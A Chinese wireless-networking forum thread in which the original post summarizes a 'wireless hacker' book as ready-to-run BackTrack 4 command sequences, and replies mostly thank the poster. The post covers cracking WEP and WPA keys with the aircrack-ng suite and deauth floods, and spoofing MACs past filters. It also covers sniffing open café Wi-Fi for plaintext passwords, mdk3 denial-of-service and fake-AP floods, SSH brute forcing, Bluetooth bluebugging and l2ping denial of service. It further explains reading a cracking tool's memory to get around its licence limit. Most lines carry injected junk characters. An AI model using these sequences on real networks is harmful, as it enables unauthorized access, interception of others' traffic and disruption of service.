搜索
格西欧解决方案
树熊
查看: 9268|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3715

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。; D$ W( B/ t8 h% o7 A
1 m1 `. \0 P% D0 A7 }# J4 e% J
以下所有操作均在BackTrack 4中进行。
. J5 v. |: B6 j/ b  N9 c& X/ w) I8 B& [) f- q; J8 r2 J+ u
& J% D: J3 D% A& _7 ?5 n1 B) I
无线WEP加密P解:
, x2 h7 s- V9 W; K4 ^8 |
9 g3 J* u' }2 M* N& M注入P解:, P; B. V, \& N1 C, m# i7 M) K2 T

0 x1 \$ Y( @" l3 ^% d* Pifconfig
' k/ u6 \: ?( o& n2 Z( d
0 V4 ]7 p; x1 p' c) z9 O) I+ A/ n; ^ifconfig –a
8 t0 D' U9 h- _( k! ^0 [
1 [! Q: n, r# d6 v- bifconfig wlan0(无线网卡) up* l; |0 E/ x6 F4 g. y
# O. a0 T  E" \
airmon-ng start wlan0# Y8 D5 U" ]7 S7 j8 d

$ p3 A* u/ F6 Iairodump-ng mon0% P) \$ ^- j' t) H9 K
0 q: e% \4 w4 N. v) g
airodump-ng --ivs –w ivsfile –c 频道 mon0或/ H6 a( Y. U/ k; z1 Z  @- _
, a/ P4 G2 l. l" ?7 V
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon08 k* r6 s( S7 L+ W! n3 [9 w
( R5 [# X6 E9 Z1 _6 y7 }0 }, }% r$ {
aireplay-ng -3 –b BSSID –h Station mon0
, }& K: I7 Y5 G9 }( `' b6 z1 ~% z
aircrack-ng ivsfile-01.ivs2 _) W7 l3 P  F2 _7 H" y8 o( T
3 e1 f* Z# E5 c9 f8 ^
虚连接P解(适用于无客户端连接APP解)- J. z/ E; G/ \3 C7 p4 `

8 `& [) @( x; }/ B& \ifconfig
/ y: f0 `8 Z& l
! K) x! Q3 W' D/ nifconfig –a4 \6 X* ]; }: @/ x1 |- w

6 d$ m/ a1 Y: H& b$ jifconfig wlan0(无线网卡) up6 i+ U/ L% R+ h# ?
' D7 _9 m7 d/ [$ B6 _& P
airmon-ng start wlan00 ?" {; ]$ N. |7 c1 z

5 n  k$ h7 d9 }0 z) Mairodump-ng mon0
9 B! P% f7 D# O5 _: ^  D4 [9 O3 n1 N6 g6 X, v* H; G2 e
airodump-ng --ivs –w ivsfile –c 频道 mon0或
- w$ n3 p1 S4 r! e" r! e' t% t0 ?$ e5 r) E
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0' G) K8 E" l0 `
* u' a" y8 q) d- F: X5 O
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0  U) l! k5 @% X- C& |
8 B  J+ w# @2 T1 k/ d* l0 D  c
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
4 }& T9 \. V) W
5 L$ X$ n9 D7 taircrack-ng ivsfile-01.ivs
2 L7 K- v  X( G: c: T, q) e
% O7 C% Q- K6 F6 l& M0 @7 m" T( n* a  s( I* H. l9 H# d  \4 o7 S/ `1 m, c
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
) v" E9 q" ~1 r$ W- Q3 X# |9 h% V# O) L8 F9 f# {4 l

0 p- B2 N) r0 d) nWPA-PSKP解
* P  S( d, |6 C) U% G, r. q! S. b
ifconfig
- a) A* a8 B$ b7 A: J2 ~& B$ g8 \4 @
ifconfig –a' I4 u0 F# }: g# F' q

) l. o$ S0 n5 L/ D. c5 o$ b% t: q! T9 y% yifconfig wlan0(无线网卡) up
! ^! L1 `% J" y1 D" u+ F# Y( {* G, q% D2 M
airmon-ng start wlan0) r* M/ s4 ]' j8 Y( p4 w

* Y3 V& a2 T( B5 Vairodump-ng mon0  G$ z; ^4 P0 Y" s. K
% B; j& ]0 I$ I# C
airodump-ng –w capfile –c 频道 mon0
0 w: J/ x9 T8 b+ i5 q5 w+ o5 a2 R  f# a0 _, o
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包0 H4 G6 S. I% o$ W% c$ |

2 X2 V5 M6 o4 }7 Eaircrack-ng –w Dic capfile-01.cap或
+ p6 X0 a% ]$ R1 K0 N4 m; m! b
& [# C( l  p6 P' O3 b, |- ccowpatty –f Dic –r capfile-01.cap –s SSID% g0 a# ~' J9 |; p0 V# N2 `

' ~- Q0 U. T) ]; b$ S  ycowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
& `, a4 f& Q0 _, e" F0 r; }( z6 ]1 k: X' G
傻瓜式P解软件SpoonWPA。; a/ J2 F+ y/ P7 P5 R

% E- f' x2 w( r" b! F7 N# VBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
5 }% m$ F9 S5 f/ @8 s1 K5 }3 c) e4 z: M2 G
  U. i6 s* z" p6 o* }' g
字典文件的生成和上传
7 z0 ?# ^5 Q- a& {* O3 i8 k* w/ T- _1 w, I! M
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。1 x3 D" `# ^* J' J3 F
1 C" J# d2 _3 x# y. K' V
) I- Y9 o: m' \. I4 z
BT4下开启Tftp:Services—TFTPD—start TFTPD+ f- \& s' B+ L$ G+ J. e& R, q
1 Q( J' h3 y7 U! Z8 \
在Windows的CMD中运行 tftp –i IP put **.dic
' g7 G3 [  B7 a* I* z
* q" {1 x' w( e% d9 |1 ~/ C/ s2 o
, b9 F! c- _5 g; P" Y' H% P1 ZBT4下开启SSH:Services—SSH—start SSH
0 f9 n3 m- {  {1 u" P/ l$ l: o' I
" b& `+ V/ b6 P( m) r4 ]+ JWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root% p$ s* u: ]' Y8 F- l
" i  v( X% _0 \

( g1 k& @! t" p; s  \8 zAP限制MAC时的解决
* Z$ g1 t$ j( W$ M! P3 Y: l9 e7 D+ K' P0 l0 l
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:$ v3 K+ i3 N0 I" ]9 c$ z7 u. V$ ~

7 `) _7 G3 k6 w3 j: `5 Vifconfig wlan0 hw ether NewMAC
, j$ p5 _, a/ [+ P% N* z
- S+ R2 }8 i' e& c& G1 N! _- i( s2 u* v$ p( P! q
关闭SSID广播的AP探测:
+ Z' q0 }' m, b4 w2 v# L0 F/ }/ s0 w, w
1.     Deauth攻击:
: i. Z; L- Y- b" h% ]( ^
7 w* B! {! f9 Y, ^% v+ cairodump-ng mon0
8 r' r6 z1 L: x; @  E% A  S  c6 s, }! D0 K" f* |7 E, `# r
aireplay-ng -0 10 –a BSSID –h Station mon0" t3 c9 E3 S% q- r' @  K8 a6 P

2 q2 t1 N1 E4 B, g$ s2.     抓包分析
5 L/ ?8 E8 T( i' |& F. b$ o* O6 }1 W) n$ Y: `0 I- D6 F. H* k7 k) a
Omnipeek
' L- N9 c% u/ x7 l0 l0 C
& v2 Y" l5 f3 k2 H+ ZTcpdump –n –e –vvv –i 网卡名+ g, S/ U% a8 I' j7 Y+ s+ |8 e! V
: l- H1 M8 Z) E, @9 A
3.     暴力P解. c1 }: t  d* w% w) f
9 @; r4 \5 R& t* X  d. ^2 L
Charon 1.1暴力P解
! j3 H3 A3 \: O3 I- u
7 C8 A, g6 n0 ?( _5 O3 l" p! m. d* W/ X7 O$ ^5 e7 f7 h' \3 h  g- u
无线加密数据包的解密
- b6 C6 [! j6 T0 s. h, O* s) @4 K* ?/ d5 K7 y
# h  Y9 y# T3 `& H
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
) ~7 |( e+ i! V9 x) A: u
6 n8 o& o6 Q( _; mFilterNS     DNS解析数据包
7 s, w' t& X6 ?7 ]( X/ X+ @7 a
& k/ s1 M, h) K- ~) j7 S3 [" xFilter:HTTP    WEB访问数据包
# t6 ?$ @+ L& q9 A+ u6 R, e
: K  H8 B( C0 A" F" {Filter:msnms   MSN
4 }& J! z& ]" |) t/ f
! E  ~6 z& r# p0 `3 i6 }! |Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。, D8 U2 C  c. @& w8 d

  H. Y( Y9 }, J- e/ G/ X- ^使用airdecap-ng解密:
, L) q1 s* |- }* G! }
) p7 V( V# J* w) Q0 \Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
! w. t5 g* p4 ^) w, P2 b
, K# @# O6 m  J) z4 O* _
4 S5 T$ |1 r$ J- J, r% R- r3 v咖啡馆中无线数据截取(开放式无加密AP): v# s$ q) u- a4 p9 d
1 ^( E$ R6 U: |6 ?8 z8 n) ?' `
1.Airodump-ng –w data –c频道 mon0, O0 p% E' h; r0 I# H

) O3 a# F" `! g6 p! H+ O) O2.使用WireShark打开分析; W; Y1 I  U3 P
! `( _- }9 l- n- d

6 r6 S4 h3 i- C3 H' j' {6 hBT4下的渗透工具:
: H9 k  h. a3 l
. B6 j% ?+ ~5 }7 M, s1 jnmap –sP IP/24        判断C段下存活的主机 & v/ x. j" ]+ O

+ x' X" k2 T- v5 z8 o. B! Snmap –vv –sS IP/24 –p Port    扫描指定端口是否开放3 [$ v9 Q7 _/ B( q9 ^
0 G& M9 A8 b0 E3 X" Q
nmap –vv –sV IP –p port   指定端口的详细信息。。。
& R+ I+ p  d2 ?3 q( Q, S5 U
$ C, F  R# [% g3 O/ Hnamp –O IP/24    判断主机的系统版本
& W" r$ b0 C; Z: c9 L) S" J
; P* V+ N; ~- v% @' @! Z+ N6 H; N) G& h0 C
GUI 版nmap:Zenmap 5 n% t; U% ~' E3 `6 X
* x" u: \9 w+ X) `

0 [9 q& w1 O# M# LAmap使用:amap –B IP port1 p9 ]7 ?, h4 r' u7 i9 a7 L

$ z* `# m+ F) E; o/ f) ?Nbtscan(扫描Windows网络NetBios信息):
$ F- L$ J4 E  G$ Y, S
1 J% u: C; U. Vnbtscan –v –s : IP/242 B4 H( f! p5 y6 u. B- `

' G% y8 [+ ?# r5 a5 e/ gnbtscan –r IP
' i5 W4 X- j9 v( Y3 [& U4 M8 x2 E: Y! w/ \/ }) ^3 G. T
/ p1 ?3 U1 @, i) v1 n2 {2 b; o/ D: E
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
; j8 r' o4 F- e+ ?4 \' t8 l8 C8 c1 Q7 ^
6 R- V6 e6 z) _8 H2 e8 `$ A
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)7 ?  m. Z9 O" {  g3 R

$ _7 ?! s7 T$ sBruteSSH: ./bruthe.py –h IP –u Username –d Dic
. o/ N7 }2 W) t. ?/ R: J0 t
$ V& u4 v" }: b/ q# rMetasploit3使用8 P9 l( E5 g! C( u$ D" r
无线D.0.S9 b. i: @% F8 C! L+ W% R
" u  l+ |2 @& `9 X$ q
( U" O) M, ]9 }: U
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)' e- @' ]& t+ c1 I5 |7 E: b7 b

4 h& r' V* M7 xairmon-ng start wlan0
' e+ O7 x2 E+ S! M; N0 g
' L  T, r  _: K5 n( b$ F; L# qairodump-ng mon0
, f  c* C& Z) }' Q( R) s3 `  C6 R2 K! {/ y9 q* N! x% ]
mdk3 mon0 a –a BSSID
3 j  y( `1 F& j1 T- A1 ]8 \1 U1 h! A& Y
对所有的AP攻击:mdk3 mon0 a- `4 K5 F2 `- [0 b& [! m1 E" ?
! X; c: s" ^/ `

7 b# {8 k* V* P; X, d/ z$ {6 [( x% XDeauth Flood 攻击
! e% |# M& k; m! N0 m' f4 O1 P! z) B% N4 v$ E6 m  A7 k$ U
mdk3 mon0 d –c Channel! G( n' u5 W, |  j5 J+ [

; Z9 q: r% W& I- B" e* Q: y6 \图形化D.O.S攻击:Charon  f* x+ D* B/ m7 a" g" l# \( v. t& G

  `4 i9 z# U3 S* U7 p; E$ {( S4 @
当受到攻击时,使用Wireshark抓包可以看到异常信息。) @9 M6 l) N( |6 R5 P

4 [& V! R) K/ H+ F. R+ R3 J0 W9 W! {6 |: p# z# X4 _+ c: K
WPA-PSK高速P解
+ I  t* r5 W7 j% h3 z/ _7 g3 Z1 v( H, D) Q* s# z( C# S
1.       WPA-PSK PMK Hash TablesP解1 J0 k2 J! s1 _

- E* X+ g) F! n1 P. tCowpatty –d HashTable.hash –r ***.cap –s SSID
0 t* c0 \1 {! R5 b3 P9 s8 j2 `" s/ d( @
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
8 _$ C4 l% w2 T
! }5 q$ Q2 t. l+ H! B& v0 K# H2.       GPU辅助高速P解1 b' i8 z6 b; u5 ^6 b3 W

/ A1 L+ t9 _! z使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。4 C. {; Z: q7 b$ Q" D* ?
2 ?; ?3 }* X2 q6 o
3.       分布式P解# O0 U7 Q+ C3 \: V& R) `8 |

( P, K: D0 L& `7 X* x5 M4 L& ]4 t$ L! G
AP的伪造7 E( g* q3 \3 n4 ]# Y  w

9 I$ g! x+ f; K: c6 c把AP的MAC改成目标AP的MAC
4 L/ d0 Q/ N0 L5 |2 W% N7 R& X" [/ m( g$ T3 p& f3 d4 X
网卡软AP
6 c/ L6 ?" ?: E0 _* \
& c9 W, i/ [8 u
" j  q2 e; W1 X  J6 q$ \8 D# B伪造大量虚假AP信号:
  n9 e8 k2 F: P
+ E" m4 ^! B/ @1 h9 H) v随机SSID:mdk3 mon0 b –g –c 频道
6 T& \$ G3 u1 u7 q
; U9 b0 B7 {- H  g  ~1 k指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度4 ?5 w& I& N& ~% E( d: R) U- V

) \2 q7 A5 u! I; a1 a) w6 d* j8 L3 G9 ]1 y. P* ]1 ?
War-Driving
8 S1 N5 J; X! Y3 }; b9 S
( }  d+ A" H4 Z" k热点地图绘制( g! L1 y: T& H7 c2 M* `0 z6 O7 D$ Q
  X% u# Y0 T$ a0 Z# Q1 C
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。5 k  [, K$ ]$ F+ W; c! v
  K$ n. X. Z# L, h" [7 h0 {- |5 d

1 [5 z2 n$ w# J' }Netstumble$ H& ]6 ^" e% {

5 O9 g2 m" I: Y3 Y( X1 R5 g" ]
# O2 M& c+ \( m* ^; W5 R, ]蓝牙Hacking( _' {$ v! p! o; k8 z- i7 C
# @/ C& L+ ]+ K' m
Windows下的Blue Soleil工具4 _3 m$ e( L3 k* d6 {
8 @) O# r8 j* _" o0 v5 ?
BT4:. c! P( ^2 S# s- k/ J& T) `
2 v! n# A0 S) L% q
hciconfig 查看蓝牙适配器
0 H) }& N' S" g& A- L1 Z
* H+ r& A3 }  q' @+ e& d( R- phciconfig hci0 up 载入蓝牙适配器2 g- w, r; V- ~6 P+ U

, i7 p% |) p. w3 l' F' {hciconfig hci0 class 蓝牙适配器详细信息
4 T/ \6 H$ A& k% m5 L- u% i
- `* c" @% `6 I- H" Q- U2 r' s, y9 n, M; O
hcitool(扫描蓝牙)4 {9 x" P2 }% b

" l- ~4 N9 k, x* z' Khcitool –i hci0 scan: @: }! i) @; i& o3 @

. X  J4 }) d7 O, f6 g9 UBTscanner(扫描蓝牙)
& h& }; M' @- N* ^$ [' `9 d- n' ]8 R; W5 N

+ }3 y$ E* r  Z1 H蓝牙攻击:8 z$ {* k3 `/ D( Q2 {& X
- W% M# p0 B- G  w# j
BlueBugging (适用于BlueTooth V1.1的手机)3 O% Y9 E: r+ f' h

4 p. e8 e4 g; M; B5 dBluebugger工具:9 Z  S1 S0 h( \0 n9 G
, d4 x8 ^$ w1 n0 ?# p& J# [9 O% `
Bulebugger –a HD_Addr info: w- v$ l% Z. Z; O* i4 u
1 Y# C" W: X( [+ q# I
2 n1 B0 i6 z: c$ e' ~+ o3 L
BlueJacking
$ m- u5 V, A* d+ P/ ]  q
# X# I% B/ V. c! n# E  G) k% j+ r实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
8 y. c: u, U7 y/ X2 s4 W1 x4 N4 ~' g1 l: w0 E$ D4 h/ t

+ P& f* z& [- H! gHD_Addr修改:; `- }) `, y" `& n0 K

0 x2 n7 P. j. z8 MBdaddr工具
6 m& D2 x( O% F8 h( d) E) b$ |6 S5 M- ?5 b6 s+ r* U' ?7 N' I; l+ w8 C
bdaddr –i 蓝牙设备名 新HD_addr! U: ]( d- _) v" \( e

/ N# T0 z" w5 K% n; Z" i
, C) g+ Q( t( X9 t蓝牙D.O.S
; ^& w4 w3 a7 l4 M8 j  p: j! o6 |
; M/ y/ X% d' L; G3 d: ^: {5 S+ t8 z. ]' zl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务- f6 U5 z- ~$ d* c( P* C

4 \7 ~7 P' ~' i& t/ y( t6 ^) K& ehciconfig
( [/ |1 o9 l1 L! c2 a
* x/ l0 D  s# P! Q' Phciconfig hci0 up. r) I5 ?4 Q* _" b  J, |2 h& U8 H# }
. T! M- [6 w* y3 [9 ^; ^/ d
hcitool –i hci0 scan( p2 e- t, m- m  ?7 H
9 Y1 U2 R( P2 z8 `/ u( f- j
l2ping –s 10000 –目标MAC4 s7 x0 S" m' C
2 U' S; \2 A$ ]6 D( D

9 F3 J- e- M0 d3 r( |4 a不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
! m$ m3 v8 |# x% D9 a. s. |4 _  v0 R, x5 B/ X  z0 x# p
./fang –r ************-############ -s- T0 u6 y6 N! d  j

" I6 z9 [# V( f% D暴力P解************-############的蓝牙设备
7 Z) E! s% j$ S0 ^" f! D6 _' q. a: K) v# ?/ V
./fang –l 各厂商BD_Addr分配, F3 C; l( R) _5 j  T- _  K7 B$ ^

$ b* L; i% D, _: c$ T% n* L6 |- H- ~
7 h9 k% L' ~1 a- JWifiZoo使用: I  N5 [, k/ f, S$ W6 `

* G- J. ^# l: ]* W./wifizoo.py –c Capfile( F4 ~" g* O# T
8 X9 X9 R* O$ j, K
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

256

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

711

积分

中尉

该用户从未签到

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
* I; A) S6 R; {; P1 _! I7 i借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
7 r& T1 ~1 ]2 e& ~; R呵呵 其实也不贵 21块 快递再一点! Q" O& o* t' p# B3 A9 T: b9 [' n* Z
我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )      小黑屋 | 免责声明

GMT+8, 2015-3-2 00:35 , Processed in 0.199259 second(s), 14 queries , Gzip On ,Memcache On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表